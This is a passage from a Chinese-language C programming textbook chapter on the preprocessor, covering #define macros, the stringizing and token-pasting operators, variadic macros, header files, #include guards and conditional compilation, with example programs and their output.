明示常量:#define #define预处理器指令和其他预处理器指令一样,以#号作为一行的开 始。ANSI和后来的标准都允许#号前面有空格或制表符,而且还允许在#和 指令的其余部分之间有空格。但是旧版本的C要求指令从一行最左边开始, 而且#和指令其余部分之间不能有空格。指令可以出现在源文件的任何地 方,其定义从指令出现的地方到该文件末尾有效。我们大量使用#define指令 来定义明示常量(manifest constant)(也叫做符号常量),但是该指令还有 许多其他用途。程序清单16.1演示了#define指令的一些用法和属性。 预处理器指令从#开始运行,到后面的第1个换行符为止。也就是说,指 令的长度仅限于一行。然而,前面提到过,在预处理开始前,编译器会把多 行物理行处理为一行逻辑行。 程序清单16.1 preproc.c程序 /* preproc.c -- 简单的预处理示例 */ #include <stdio.h> #define TWO 2   /* 可以使用注释 */ #define OW "Consistency is the last refuge of the unimagina\ tive.- Oscar Wilde" /* 反斜杠把该定义延续到下一行 */ #define FOUR TWO*TWO #define PX printf("X is %d.\n", x) #define FMT "X is %d.\n" int main(void) { 1198 int x = TWO; PX; x = FOUR; printf(FMT, x); printf("%s\n", OW); printf("TWO: OW\n"); return 0; } 每行#define(逻辑行)都由3部分组成。第1部分是#define指令本身。第 2部分是选定的缩写,也称为宏。有些宏代表值(如本例),这些宏被称为 类对象宏(object-like macro)。C 语言还有类函数宏(function-like macro),稍后讨论。宏的名称中不允许有空格,而且必须遵循C变量的命 名规则:只能使用字符、数字和下划线(_)字符,而且首字符不能是数 字。第3部分(指令行的其余部分)称为替换列表或替换体(见图16.1)。 一旦预处理器在程序中找到宏的示实例后,就会用替换体代替该宏(也有例 外,稍后解释)。从宏变成最终替换文本的过程称为宏展开(macro expansion)。注意,可以在#define行使用标准C注释。如前所述,每条注释 都会被一个空格代替。 1199 图16.1 类对象宏定义的组成 运行该程序示例后,输出如下: X is 2. X is 4. Consistency is the last refuge of the unimaginative.- Oscar Wilde TWO: OW 下面分析具体的过程。下面的语句: int x = TWO; 变成了: int x = 2; 2代替了TWO。而语句: PX; 变成了: printf("X is %d.\n", x); 这里同样进行了替换。这是一个新用法,到目前为止我们只是用宏来表 示明示常量。从该例中可以看出,宏可以表示任何字符串,甚至可以表示整 个 C 表达式。但是要注意,虽然 PX 是一个字符串常量,它只打印一个名为 x的变量。 下一行也是一个新用法。读者可能认为FOUR被替换成4,但是实际的 过程是: x = FOUR; 1200 变成了: x = TWO*TWO; 即是: x = 2*2; 宏展开到此处为止。由于编译器在编译期对所有的常量表达式(只包含 常量的表达式)求值,所以预处理器不会进行实际的乘法运算,这一过程在 编译时进行。预处理器不做计算,不对表达式求值,它只进行替换。 注意,宏定义还可以包含其他宏(一些编译器不支持这种嵌套功能)。 程序中的下一行: printf (FMT, x); 变成了: printf("X is %d.\n",x); 相应的字符串替换了 FMT。如果要多次使用某个冗长的字符串,这种 方法比较方便。另外,也可以用下面的方法: const char * fmt = "X is %d.\n"; 然后可以把fmt作为printf()的格式字符串。 下一行中,用相应的字符串替换OW。双引号使替换的字符串成为字符 串常量。编译器把该字符串储存在以空字符结尾的数组中。因此,下面的指 令定义了一个字符常量: #define HAL 'Z' 而下面的指令则定义了一个字符串(Z\0): 1201 #define HAP "Z" 在程序示例16.1中,我们在一行的结尾加一个反斜杠字符使该行扩展至 下一行: #define OW "Consistency is the last refuge of the unimagina\ tive.- Oscar Wilde" 注意,第2行要与第1行左对齐。如果这样做: #define OW "Consistency is the last refuge of the unimagina\ tive.- Oscar Wilde" 那么输出的内容是: Consistency is the last refuge of the unimagina tive.- Oscar Wilde 第2行开始到tive之间的空格也算是字符串的一部分。 一般而言,预处理器发现程序中的宏后,会用宏等价的替换文本进行替 换。如果替换的字符串中还包含宏,则继续替换这些宏。唯一例外的是双引 号中的宏。因此,下面的语句: printf("TWO: OW"); 打印的是TWO: OW,而不是打印: 2: Consistency is the last refuge of the unimaginative.- Oscar Wilde 要打印这行,应该这样写: printf("%d: %s\n", TWO, OW); 这行代码中,宏不在双引号内。 1202 那么,何时使用字符常量?对于绝大部分数字常量,应该使用字符常 量。如果在算式中用字符常量代替数字,常量名能更清楚地表达该数字的含 义。如果是表示数组大小的数字,用符号常量后更容易改变数组的大小和循 环次数。如果数字是系统代码(如,EOF),用符号常量表示的代码更容易 移植(只需改变EOF的定义)。助记、易更改、可移植,这些都是符号常量 很有价值的特性。 C语言现在也支持const关键字,提供了更灵活的方法。用const可以创建 在程序运行过程中不能改变的变量,可具有文件作用域或块作用域。另一方 面,宏常量可用于指定标准数组的大小和const变量的初始值。 #define LIMIT 20 const int LIM = 50; static int data1[LIMIT];    // 有效 static int data2[LIM];     // 无效 const int LIM2 = 2 * LIMIT;  // 有效 const int LIM3 = 2 * LIM;   // 无效 这里解释一下上面代码中的“无效”注释。在C中,非自动数组的大小应 该是整型常量表达式,这意味着表示数组大小的必须是整型常量的组合(如 5)、枚举常量和sizeof表达式,不包括const声明的值(这也是C++和C的区 别之一,在C++中可以把const值作为常量表达式的一部分)。但是,有的实 现可能接受其他形式的常量表达式。例如,GCC 4.7.3不允许data2的声明, 但是Clang 4.6允许。 16.2.1 记号 从技术角度来看,可以把宏的替换体看作是记号(token)型字符串, 而不是字符型字符串。C预处理器记号是宏定义的替换体中单独的“词”。用 1203 空白把这些词分开。例如: #define FOUR 2*2 该宏定义有一个记号:2*2序列。但是,下面的宏定义中: #define SIX 2 * 3 有3个记号:2、*、3。 替换体中有多个空格时,字符型字符串和记号型字符串的处理方式不 同。考虑下面的定义: #define EIGHT 4 * 8 如果预处理器把该替换体解释为字符型字符串,将用4 * 8替换EIGHT。 即,额外的空格是替换体的一部分。如果预处理器把该替换体解释为记号型 字符串,则用3个的记号4 * 8(分别由单个空格分隔)来替换EIGHT。换而 言之,解释为字符型字符串,把空格视为替换体的一部分;解释为记号型字 符串,把空格视为替换体中各记号的分隔符。在实际应用中,一些C编译器 把宏替换体视为字符串而不是记号。在比这个例子更复杂的情况下,两者的 区别才有实际意义。 顺带一提,C编译器处理记号的方式比预处理器复杂。由于编译器理解 C语言的规则,所以不要求代码中用空格来分隔记号。例如,C编译器可以 把2*2直接视为3个记号,因为它可以识别2是常量,*是运算符。 16.2.2 重定义常量 假设先把LIMIT定义为20,稍后在该文件中又把它定义为25。这个过程 称为重定义常量。不同的实现采用不同的重定义方案。除非新定义与旧定义 相同,否则有些实现会将其视为错误。另外一些实现允许重定义,但会给出 警告。ANSI标准采用第1种方案,只有新定义和旧定义完全相同才允许重定 义。 1204 具有相同的定义意味着替换体中的记号必须相同,且顺序也相同。因 此,下面两个定义相同: #define SIX 2 * 3 #define SIX 2 * 3 这两条定义都有 3 个相同的记号,额外的空格不算替换体的一部分。而 下面的定义则与上面两条宏定义不同: #define SIX 2*3 这条宏定义中只有一个记号,因此与前两条定义不同。如果需要重定义 宏,使用#undef 指令(稍后讨论)。 如果确实需要重定义常量,使用const关键字和作用域规则更容易些。 1205 16.3 在#define中使用参数 在#define中使用参数可以创建外形和作用与函数类似的类函数宏。带有 参数的宏看上去很像函数,因为这样的宏也使用圆括号。类函数宏定义的圆 括号中可以有一个或多个参数,随后这些参数出现在替换体中,如图16.2所 示。 图16.2 函数宏定义的组成 下面是一个类函数宏的示例: #define SQUARE(X) X*X 在程序中可以这样用: z = SQUARE(2); 这看上去像函数调用,但是它的行为和函数调用完全不同。程序清单 16.2演示了类函数宏和另一个宏的用法。该示例中有一些陷阱,请读者仔细 阅读序。 程序清单16.2 mac_arg.c程序 /* mac_arg.c -- 带参数的宏 */ #include <stdio.h> #define SQUARE(X) X*X 1206 #define PR(X)  printf("The result is %d.\n", X) int main(void) { int x = 5; int z; printf("x = %d\n", x); z = SQUARE(x); printf("Evaluating SQUARE(x): "); PR(z); z = SQUARE(2); printf("Evaluating SQUARE(2): "); PR(z); printf("Evaluating SQUARE(x+2): "); PR(SQUARE(x + 2)); printf("Evaluating 100/SQUARE(2): "); PR(100 / SQUARE(2)); printf("x is %d.\n", x); printf("Evaluating SQUARE(++x): "); PR(SQUARE(++x)); 1207 printf("After incrementing, x is %x.\n", x); return 0; } SQUARE宏的定义如下: #define SQUARE(X) X*X 这里,SQUARE 是宏标识符,SQUARE(X)中的 X 是宏参数,X*X 是替 换列表。程序清单 16.2 中出现SQUARE(X)的地方都会被X*X替换。这与前 面的示例不同,使用该宏时,既可以用X,也可以用其他符号。宏定义中的 X由宏调用中的符号代替。因此,SQUARE(2)替换为2*2,X实际上起到参数 的作用。 然而,稍后你将看到,宏参数与函数参数不完全相同。下面是程序的输 出。注意有些内容可能与我们的预期不符。实际上,你的编译器输出甚至与 下面的结果完全不同。 x = 5 Evaluating SQUARE(x): The result is 25. Evaluating SQUARE(2): The result is 4. Evaluating SQUARE(x+2): The result is 17. Evaluating 100/SQUARE(2): The result is 100. x is 5. Evaluating SQUARE(++x): The result is 42. After incrementing, x is 7. 1208 前两行与预期相符,但是接下来的结果有点奇怪。程序中设置x的值为 5,你可能认为SQUARE(x+2)应该是 7*7,即 49。但是,输出的结果是 17, 这不是一个平方值!导致这样结果的原因是,我们前面提到过,预处理器不 做计算、不求值,只替换字符序列。预处理器把出现x的地方都替换成x+2。 因此,x*x变成了x+2*x+2。如果x为5,那么该表达式的值为: 5+2*5+2 = 5 + 10 + 2 = 17 该例演示了函数调用和宏调用的重要区别。函数调用在程序运行时把参 数的值传递给函数。宏调用在编译之前把参数记号传递给程序。这两个不同 的过程发生在不同时期。是否可以修改宏定义让SQUARE(x+2)得36?当然 可以,要多加几个圆括号: #define SQUARE(x) (x)*(x) 现在SQUARE(x+2)变成了(x+2)*(x+2),在替换字符串中使用圆括号就得 到符合预期的乘法运算。 但是,这并未解决所有的问题。下面的输出行: 100/SQUARE(2) 将变成: 100/2*2 根据优先级规则,从左往右对表达式求值:(100/2)*2,即50*2,得 100。把SQUARE(x)定义为下面的形式可以解决这种混乱: #define SQUARE(x) (x*x) 这样修改定义后得100/(2*2),即100/4,得25。 要处理前面的两种情况,要这样定义: 1209 #define SQUARE(x) ((x)*(x)) 因此,必要时要使用足够多的圆括号来确保运算和结合的正确顺序。 尽管如此,这样做还是无法避免程序中最后一种情况的问题。 SQUARE(++x)变成了++x*++x,递增了两次x,一次在乘法运算之前,一次 在乘法运算之后: ++x*++x = 6*7 = 42 由于标准并未对这类运算规定顺序,所以有些编译器得 7*6。而有些编 译器可能在乘法运算之前已经递增了x,所以7*7得49。在C标准中,对该表 达式求值的这种情况称为未定义行为。无论哪种情况,x的开始值都是5,虽 然从代码上看只递增了一次,但是x的最终值是7。 解决这个问题最简单的方法是,避免用++x 作为宏参数。一般而言,不 要在宏中使用递增或递减运算符。但是,++x可作为函数参数,因为编译器 会对++x求值得5后,再把5传递给函数。 16.3.1 用宏参数创建字符串:#运算符 下面是一个类函数宏: #define PSQR(X) printf("The square of X is %d.\n", ((X)*(X))); 假设这样使用宏: PSQR(8); 输出为: The square of X is 64. 注意双引号字符串中的X被视为普通文本,而不是一个可被替换的记 号。 1210 C允许在字符串中包含宏参数。在类函数宏的替换体中,#号作为一个 预处理运算符,可以把记号转换成字符串。例如,如果x是一个宏形参,那 么#x就是转换为字符串"x"的形参名。这个过程称为字符串化 (stringizing)。程序清单16.3演示了该过程的用法。 程序清单16.3 subst.c程序 /* subst.c -- 在字符串中替换 */ #include <stdio.h> #define PSQR(x) printf("The square of " #x " is %d.\n",((x)*(x))) int main(void) { int y = 5; PSQR(y); PSQR(2 + 4); return 0; } 该程序的输出如下: The square of y is 25. The square of 2 + 4 is 36. 调用第1个宏时,用"y"替换#x。调用第2个宏时,用"2 + 4"替换#x。 ANSI C字符串的串联特性将这些字符串与printf()语句的其他字符串组合,生 成最终的字符串。例如,第1次调用变成: 1211 printf("The square of " "y" " is %d.\n",((y)*(y))); 然后,字符串串联功能将这3个相邻的字符串组合成一个字符串: "The square of y is %d.\n" 16.3.2 预处理器黏合剂:##运算符 与#运算符类似,##运算符可用于类函数宏的替换部分。而且,##还可 用于对象宏的替换部分。##运算符把两个记号组合成一个记号。例如,可以 这样做: #define XNAME(n) x ## n 然后,宏XNAME(4)将展开为x4。程序清单16.4演示了##作为记号粘合 剂的用法。 程序清单16.4 glue.c程序 // glue.c -- 使用##运算符 #include <stdio.h> #define XNAME(n) x ## n #define PRINT_XN(n) printf("x" #n " = %d\n", x ## n); int main(void) { int XNAME(1) = 14;   // 变成 int x1 = 14; int XNAME(2) = 20;  // 变成 int x2 = 20; int x3 = 30; 1212 PRINT_XN(1);      // 变成 printf("x1 = %d\n", x1); PRINT_XN(2);      // 变成 printf("x2 = %d\n", x2); PRINT_XN(3);      // 变成 printf("x3 = %d\n", x3); return 0; } 该程序的输出如下: x1 = 14 x2 = 20 x3 = 30 注意,PRINT_XN()宏用#运算符组合字符串,##运算符把记号组合为一 个新的标识符。 16.3.3 变参宏:...和_ _VA_ARGS_ _ 一些函数(如 printf())接受数量可变的参数。stdvar.h 头文件(本章后 面介绍)提供了工具,让用户自定义带可变参数的函数。C99/C11也对宏提 供了这样的工具。虽然标准中未使用“可变”(variadic)这个词,但是它已 成为描述这种工具的通用词(虽然,C标准的索引添加了字符串化 (stringizing)词条,但是,标准并未把固定参数的函数或宏称为固定函数和不 变宏)。 通过把宏参数列表中最后的参数写成省略号(即,3个点...)来实现这 一功能。这样,预定义宏 _ _VA_ARGS_ _可用在替换部分中,表明省略号代表什么。例如,下面 的定义: 1213 #define PR(...) printf(_ _VA_ARGS_ _) 假设稍后调用该宏: PR("Howdy"); PR("weight = %d, shipping = $%.2f\n", wt, sp); 对于第1次调用,_ _VA_ARGS_ _展开为1个参数:"Howdy"。 对于第2次调用,_ _VA_ARGS_ _展开为3个参数:"weight = %d, shipping = $%.2f\n"、wt、sp。 因此,展开后的代码是: printf("Howdy"); printf("weight = %d, shipping = $%.2f\n", wt, sp); 程序清单16.5演示了一个示例,该程序使用了字符串的串联功能和#运 算符。 程序清单16.5 variadic.c程序 // variadic.c -- 变参宏 #include <stdio.h> #include <math.h> #define PR(X, ...) printf("Message " #X ": " __VA_ARGS__) int main(void) { double x = 48; 1214 double y; y = sqrt(x); PR(1, "x = %g\n", x); PR(2, "x = %.2f, y = %.4f\n", x, y); return 0; } 第1个宏调用,X的值是1,所以#X变成"1"。展开后成为: print("Message " "1" ": " "x = %g\n", x); 然后,串联4个字符,把调用简化为: print("Message 1: x = %g\n", x); 下面是该程序的输出: Message 1: x = 48 Message 2: x = 48.00, y = 6.9282 记住,省略号只能代替最后的宏参数: #define WRONG(X, ..., Y) #X #_ _VA_ARGS_ _ #y //不能这样做 1215 16.4 宏和函数的选择 有些编程任务既可以用带参数的宏完成,也可以用函数完成。应该使用 宏还是函数?这没有硬性规定,但是可以参考下面的情况。 使用宏比使用普通函数复杂一些,稍有不慎会产生奇怪的副作用。一些 编译器规定宏只能定义成一行。不过,即使编译器没有这个限制,也应该这 样做。 宏和函数的选择实际上是时间和空间的权衡。宏生成内联代码,即在程 序中生成语句。如果调用20次宏,即在程序中插入20行代码。如果调用函数 20次,程序中只有一份函数语句的副本,所以节省了空间。然而另一方面, 程序的控制必须跳转至函数内,随后再返回主调程序,这显然比内联代码花 费更多的时间。 宏的一个优点是,不用担心变量类型(这是因为宏处理的是字符串,而 不是实际的值)。因此,只要能用int或float类型都可以使用SQUARE(x)宏。 C99提供了第3种可替换的方法——内联函数。本章后面将介绍。 对于简单的函数,程序员通常使用宏,如下所示: #define MAX(X,Y) ((X) > (Y) ? (X) : (Y)) #define ABS(X) ((X) < 0 ? -(X) : (X)) #define ISSIGN(X) ((X) == '+' || (X) == '-' ? 1 : 0) (如果x是一个代数符号字符,最后一个宏的值为1,即为真。) 要注意以下几点。 记住宏名中不允许有空格,但是在替换字符串中可以有空格。ANSI C 允许在参数列表中使用空格。 1216 用圆括号把宏的参数和整个替换体括起来。这样能确保被括起来的部分 在下面这样的表达式中正确地展开: forks = 2 * MAX(guests + 3, last); 用大写字母表示宏函数的名称。该惯例不如用大写字母表示宏常量应用 广泛。但是,大写字母可以提醒程序员注意,宏可能产生的副作用。 如果打算使用宏来加快程序的运行速度,那么首先要确定使用宏和使用 函数是否会导致较大差异。在程序中只使用一次的宏无法明显减少程序的运 行时间。在嵌套循环中使用宏更有助于提高效率。许多系统提供程序分析器 以帮助程序员压缩程序中最耗时的部分。 假设你开发了一些方便的宏函数,是否每写一个新程序都要重写这些 宏?如果使用#include指令,就不用这样做了。 1217 16.5 文件包含:#include 当预处理器发现#include 指令时,会查看后面的文件名并把文件的内容 包含到当前文件中,即替换源文件中的#include指令。这相当于把被包含文 件的全部内容输入到源文件#include指令所在的位置。#include指令有两种形 式: #include <stdio.h>     ←文件名在尖括号中 #include "mystuff.h"   ←文件名在双引号中 在 UNIX 系统中,尖括号告诉预处理器在标准系统目录中查找该文件。 双引号告诉预处理器首先在当前目录中(或文件名中指定的其他目录)查找 该文件,如果未找到再查找标准系统目录: #include <stdio.h>     ←查找系统目录 #include "hot.h"      ←查找当前工作目录 #include "/usr/biff/p.h" ←查找/usr/biff目录 集成开发环境(IDE)也有标准路径或系统头文件的路径。许多集成开 发环境提供菜单选项,指定用尖括号时的查找路径。在 UNIX 中,使用双引 号意味着先查找本地目录,但是具体查找哪个目录取决于编译器的设定。有 些编译器会搜索源代码文件所在的目录,有些编译器则搜索当前的工作目 录,还有些搜索项目文件所在的目录。 ANSI C不为文件提供统一的目录模型,因为不同的计算机所用的系统 不同。一般而言,命名文件的方法因系统而异,但是尖括号和双引号的规则 与系统无关。 为什么要包含文件?因为编译器需要这些文件中的信息。例如,stdio.h 文件中通常包含EOF、NULL、getchar()和 putchar()的定义。getchar()和 putchar()被定义为宏函数。此外,该文件中还包含C的其他I/O函数。 1218 C语言习惯用.h后缀表示头文件,这些文件包含需要放在程序顶部的信 息。头文件经常包含一些预处理器指令。有些头文件(如stdio.h)由系统提 供,当然你也可以创建自己的头文件。 包含一个大型头文件不一定显著增加程序的大小。在大部分情况下,头 文件的内容是编译器生成最终代码时所需的信息,而不是添加到最终代码中 的材料。 16.5.1 头文件示例 假设你开发了一个存放人名的结构,还编写了一些使用该结构的函数。 可以把不同的声明放在头文件中。程序清单16.6演示了一个这样的例子。 程序清单16.6 names_st.h头文件 // names_st.h -- names_st 结构的头文件 // 常量 #include <string.h> #define SLEN 32 // 结构声明 struct names_st { char first[SLEN]; char last[SLEN]; }; // 类型定义 1219 typedef struct names_st names; // 函数原型 void get_names(names *); void show_names(const names *); char * s_gets(char * st, int n); 该头文件包含了一些头文件中常见的内容:#define指令、结构声明、 typedef和函数原型。注意,这些内容是编译器在创建可执行代码时所需的信 息,而不是可执行代码。为简单起见,这个特殊的头文件过于简单。通常, 应该用#ifndef和#define防止多重包含头文件。我们稍后介绍这些内容。 可执行代码通常在源代码文件中,而不是在头文件中。例如,程序清单 16.7中有头文件中函数原型的定义。该程序包含了names_st.h头文件,所以 编译器知道names类型。 程序清单16.7 name_st.c源文件 // names_st.c -- 定义 names_st.h中的函数 #include <stdio.h> #include "names_st.h"  // 包含头文件 // 函数定义 void get_names(names * pn) { printf("Please enter your first name: "); s_gets(pn->first, SLEN); 1220 printf("Please enter your last name: "); s_gets(pn->last, SLEN); } void show_names(const names * pn) { printf("%s %s", pn->first, pn->last); } char * s_gets(char * st, int n) { char * ret_val; char * find; ret_val = fgets(st, n, stdin); if (ret_val) { find = strchr(st, '\n');  // 查找换行符 if (find)          // 如果地址不是NULL, *find = '\0';     // 在此处放置一个空字符 else while (getchar() != '\n') 1221 continue;   // 处理输入行中的剩余字符 } return ret_val; } get_names()函数通过s_gets()函数调用了fgets()函数,避免了目标数组溢 出。程序清单16.8使用了程序清单16.6的头文件和程序清单16.7的源文件。 程序清单16.8 useheader.c程序 // useheader.c -- 使用 names_st 结构 #include <stdio.h> #include "names_st.h" // 记住要链接 names_st.c int main(void) { names candidate; get_names(&candidate); printf("Let's welcome "); show_names(&candidate); printf(" to this program!\n"); return 0; 1222 } 下面是该程序的输出: Please enter your first name: Ian Please enter your last name: Smersh Let's welcome Ian Smersh to this program! 该程序要注意下面几点。 两个源代码文件都使用names_st类型结构,所以它们都必须包含 names_st.h头文件。 必须编译和链接names_st.c和useheader.c源代码文件。 声明和指令放在nems_st.h头文件中,函数定义放在names_st.c源代码文 件中。 16.5.2 使用头文件 浏览任何一个标准头文件都可以了解头文件的基本信息。头文件中最常 用的形式如下。 明示常量——例如,stdio.h中定义的EOF、NULL和BUFSIZE(标准I/O 缓冲区大小)。 宏函数——例如,getc(stdin)通常用getchar()定义,而getc()经常用于定 义较复杂的宏,头文件ctype.h通常包含ctype系列函数的宏定义。 函数声明——例如,string.h头文件(一些旧的系统中是strings.h)包含 字符串函数系列的函数声明。在ANSI C和后面的标准中,函数声明都是函 数原型形式。 结构模版定义——标准I/O函数使用FILE结构,该结构中包含了文件和 1223 与文件缓冲区相关的信息。FILE结构在头文件stdio.h中。 类型定义——标准 I/O 函数使用指向 FILE 的指针作为参数。通常, stdio.h 用#define 或typedef把FILE定义为指向结构的指针。类似地,size_t和 time_t类型也定义在头文件中。 许多程序员都在程序中使用自己开发的标准头文件。如果开发一系列相 关的函数或结构,那么这种方法特别有价值。 另外,还可以使用头文件声明外部变量供其他文件共享。例如,如果已 经开发了共享某个变量的一系列函数,该变量报告某种状况(如,错误情 况),这种方法就很有效。这种情况下,可以在包含这些函数声明的源代码 文件定义一个文件作用域的外部链接变量: int status = 0;    // 该变量具有文件作用域,在源代码文件 然后,可以在与源代码文件相关联的头文件中进行引用式声明: extern int status;   // 在头文件中 这行代码会出现在包含了该头文件的文件中,这样使用该系列函数的文 件都能使用这个变量。虽然源代码文件中包含该头文件后也包含了该声明, 但是只要声明的类型一致,在一个文件中同时使用定义式声明和引用式声明 没问题。 需要包含头文件的另一种情况是,使用具有文件作用域、内部链接和 const 限定符的变量或数组。const 防止值被意外修改,static 意味着每个包含 该头文件的文件都获得一份副本。因此,不需要在一个文件中进行定义式声 明,在其他文件中进行引用式声明。 #include和#define指令是最常用的两个C预处理器特性。接下来,我们介 绍一些其他指令。 1224 16.6 其他指令 程序员可能要为不同的工作环境准备C程序和C库包。不同的环境可能 使用不同的代码类型。预处理器提供一些指令,程序员通过修改#define的值 即可生成可移植的代码。#undef指令取消之前的#define定义。#if、#ifdef、 #ifndef、#else、#elif和#endif指令用于指定什么情况下编写哪些代码。#line 指令用于重置行和文件信息,#error指令用于给出错误消息,#pragma指令用 于向编译器发出指令。 16.6.1 #undef指令 #undef指令用于“取消”已定义的#define指令。也就是说,假设有如下定 义: #define LIMIT 400 然后,下面的指令: #undef LIMIT 将移除上面的定义。现在就可以把LIMIT重新定义为一个新值。即使原 来没有定义LIMIT,取消LIMIT的定义仍然有效。如果想使用一个名称,又 不确定之前是否已经用过,为安全起见,可以用#undef 指令取消该名字的定 义。 16.6.2 从C预处理器角度看已定义 处理器在识别标识符时,遵循与C相同的规则:标识符可以由大写字 母、小写字母、数字和下划线字符组成,且首字符不能是数字。当预处理器 在预处理器指令中发现一个标识符时,它会把该标识符当作已定义的或未定 义的。这里的已定义表示由预处理器定义。如果标识符是同一个文件中由前 面的#define指令创建的宏名,而且没有用#undef 指令关闭,那么该标识符是 已定义的。如果标识符不是宏,假设是一个文件作用域的C变量,那么该标 1225 识符对预处理器而言就是未定义的。 已定义宏可以是对象宏,包括空宏或类函数宏: #define LIMIT 1000     // LIMIT是已定义的 #define GOOD        // GOOD 是已定义的 #define A(X) ((-(X))*(X)) // A 是已定义的 int q;           // q 不是宏,因此是未定义的 #undef GOOD        // GOOD 取消定义,是未定义的 注意,#define宏的作用域从它在文件中的声明处开始,直到用#undef指 令取消宏为止,或延伸至文件尾(以二者中先满足的条件作为宏作用域的结 束)。另外还要注意,如果宏通过头文件引入,那么#define在文件中的位置 取决于#include指令的位置。 稍后将介绍几个预定义宏,如__DATE__和__FILE__。这些宏一定是已 定义的,而且不能取消定义。 16.6.3 条件编译 可以使用其他指令创建条件编译(conditinal compilation)。也就是说, 可以使用这些指令告诉编译器根据编译时的条件执行或忽略信息(或代码) 块。 1.#ifdef、#else和#endif指令 我们用一个简短的示例来演示条件编译的情况。考虑下面的代码: #ifdef MAVIS #include "horse.h"// 如果已经用#define定义了 MAVIS,则执行下面的指 令 1226 #define STABLES 5 #else #include "cow.h"    //如果没有用#define定义 MAVIS,则执行下面的 指令 #define STABLES 15 #endif 这里使用的较新的编译器和 ANSI 标准支持的缩进格式。如果使用旧的 编译器,必须左对齐所有的指令或至少左对齐#号,如下所示: #ifdef MAVIS #include "horse.h"     // 如果已经用#define定义了 MAVIS,则执行 下面的指令 #define STABLES 5 #else #include "cow.h"      //如果没有用#define定义 MAVIS,则执行下 面的指令 #define STABLES 15 #endif #ifdef指令说明,如果预处理器已定义了后面的标识符(MAVIS),则 执行#else或#endif指令之前的所有指令并编译所有C代码(先出现哪个指令 就执行到哪里)。如果预处理器未定义MAVIS,且有 #else指令,则执行 #else和#endif指令之间的所有代码。 #ifdef #else很像C的if else。两者的主要区别是,预处理器不识别用于标 1227 记块的花括号({}),因此它使用#else(如果需要)和#endif(必须存在) 来标记指令块。这些指令结构可以嵌套。也可以用这些指令标记C语句块, 如程序清单16.9所示。 程序清单16.9 ifdef.c程序 /* ifdef.c -- 使用条件编译 */ #include <stdio.h> #define JUST_CHECKING #define LIMIT 4 int main(void) { int i; int total = 0; for (i = 1; i <= LIMIT; i++) { total += 2 * i*i + 1; #ifdef JUST_CHECKING printf("i=%d, running total = %d\n", i, total); #endif } printf("Grand total = %d\n", total); 1228 return 0; } 编译并运行该程序后,输出如下: i=1, running total = 3 i=2, running total = 12 i=3, running total = 31 i=4, running total = 64 Grand total = 64 如果省略JUST_CHECKING定义(把它放在C注释中,或者使用#undef指 令取消它的定义)并重新编译该程序,只会输出最后一行。可以用这种方法 在调试程序。定义JUST_CHECKING并合理使用#ifdef,编译器将执行用于 调试的程序代码,打印中间值。调试结束后,可移除JUST_CHECKING定义 并重新编译。如果以后还需要使用这些信息,重新插入定义即可。这样做省 去了再次输入额外打印语句的麻烦。#ifdef还可用于根据不同的C实现选择合 适的代码块。 2.#ifndef指令 #ifndef指令与#ifdef指令的用法类似,也可以和#else、#endif一起使用, 但是它们的逻辑相反。#ifndef指令判断后面的标识符是否是未定义的,常用 于定义之前未定义的常量。如下所示: /* arrays.h */ #ifndef SIZE #define SIZE 100 1229 #endif (旧的实现可能不允许使用缩进的#define) 通常,包含多个头文件时,其中的文件可能包含了相同宏定义。#ifndef 指令可以防止相同的宏被重复定义。在首次定义一个宏的头文件中用#ifndef 指令激活定义,随后在其他头文件中的定义都被忽略。 #ifndef指令还有另一种用法。假设有上面的arrays.h头文件,然后把下面 一行代码放入一个头文件中: #include "arrays.h" SIZE被定义为100。但是,如果把下面的代码放入该头文件: #define SIZE 10 #include "arrays.h" SIZE则被设置为10。这里,当执行到#include "arrays.h"这行,处理 array.h中的代码时,由于SIZE是已定义的,所以跳过了#define SIZE 100这行 代码。鉴于此,可以利用这种方法,用一个较小的数组测试程序。测试完毕 后,移除#define SIZE 10并重新编译。这样,就不用修改头文件数组本身 了。 #ifndef指令通常用于防止多次包含一个文件。也就是说,应该像下面这 样设置头文件: /* things.h */ #ifndef THINGS_H_ #define THINGS_H_ /* 省略了头文件中的其他内容*/ 1230 #endif 假设该文件被包含了多次。当预处理器首次发现该文件被包含时, THINGS_H_是未定义的,所以定义了THINGS_H_,并接着处理该文件的其 他部分。当预处理器第2次发现该文件被包含时,THINGS_H_是已定义的, 所以预处理器跳过了该文件的其他部分。 为何要多次包含一个文件?最常见的原因是,许多被包含的文件中都包 含着其他文件,所以显式包含的文件中可能包含着已经包含的其他文件。这 有什么问题?在被包含的文件中有某些项(如,一些结构类型的声明)只能 在一个文件中出现一次。C标准头文件使用#ifndef技巧避免重复包含。但 是,这存在一个问题:如何确保待测试的标识符没有在别处定义。通常,实 现的供应商使用这些方法解决这个问题:用文件名作为标识符、使用大写字 母、用下划线字符代替文件名中的点字符、用下划线字符做前缀或后缀(可 能使用两条下划线)。例如,查看stdio.h头文件,可以发现许多类似的代 码: #ifndef _STDIO_H #define _STDIO_H // 省略了文件的内容 #endif 你也可以这样做。但是,由于标准保留使用下划线作为前缀,所以在自 己的代码中不要这样写,避免与标准头文件中的宏发生冲突。程序清单 16.10修改了程序清单16.6中的头文件,使用#ifndef避免文件被重复包含。 程序清单16.10 names.c程序 // names.h --修订后的 names_st 头文件,避免重复包含 #ifndef NAMES_H_ 1231 #define NAMES_H_ // 明示常量 #define SLEN 32 // 结构声明 struct names_st { char first[SLEN]; char last[SLEN]; }; // 类型定义 typedef struct names_st names; // 函数原型 void get_names(names *); void show_names(const names *); char * s_gets(char * st, int n); #endif 用程序清单16.11的程序测试该头文件没问题,但是如果把清单16.10中 的#ifndef保护删除后,程序就无法通过编译。 程序清单16.11 doubincl.c程序 1232 // doubincl.c -- 包含头文件两次 #include <stdio.h> #include "names.h" #include "names.h"  // 不小心第2次包含头文件 int main() { names winner = { "Less", "Ismoor" }; printf("The winner is %s %s.\n", winner.first, winner.last); return 0; } 3.#if和#elif指令 #if指令很像C语言中的if。#if后面跟整型常量表达式,如果表达式为非 零,则表达式为真。可以在指令中使用C的关系运算符和逻辑运算符: #if SYS == 1 #include "ibm.h" #endif 可以按照if else的形式使用#elif(早期的实现不支持#elif)。例如,可 以这样写: #if SYS == 1 1233 #include "ibmpc.h" #elif SYS == 2 #include "vax.h" #elif SYS == 3 #include "mac.h" #else #include "general.h" #endif 较新的编译器提供另一种方法测试名称是否已定义,即用#if defined (VAX)代替#ifdef VAX。 这里,defined是一个预处理运算符,如果它的参数是用#defined定义 过,则返回1;否则返回0。这种新方法的优点是,它可以和#elif一起使用。 下面用这种形式重写前面的示例: #if defined (IBMPC) #include "ibmpc.h" #elif defined (VAX) 